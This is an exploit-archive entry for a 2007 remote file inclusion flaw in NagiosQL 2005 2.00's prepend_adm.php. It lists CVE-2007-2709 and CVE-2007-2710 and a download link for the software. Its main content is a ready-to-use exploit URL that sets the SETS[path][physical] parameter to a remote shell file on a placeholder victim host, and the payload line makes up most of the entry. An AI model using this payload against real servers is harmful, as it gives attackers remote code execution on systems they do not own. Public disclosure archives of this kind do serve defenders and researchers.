NagiosQL 2005 2.00 - 'prepend_adm.php' Remote File Inclusion
Author: ThE TiGeR
type: webapps
platform: php
port:
date_added: 2007-05-13
date_updated: 2016-10-05
verified: 1
codes: OSVDB-36054;CVE-2007-2710;CVE-2007-2709
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comnagiosql-2.00-P00.tar.gz
#NagiosQL Remote file inclusion
#Download script : http://dfn.dl.sourceforge.net/sourceforge/nagiosql/nagiosql-2.00-P00.tar.gz
#Thanks str0ke
#Exploit :
#http://victim.com/[nagiosQL_path]/functions/prepend_adm.php?SETS[path][physical]=shell.txt?
#Discovered by ThE TiGeR
#Miro_Tiger100[at]Hotmail[dot]com
# milw0rm.com [2007-05-14]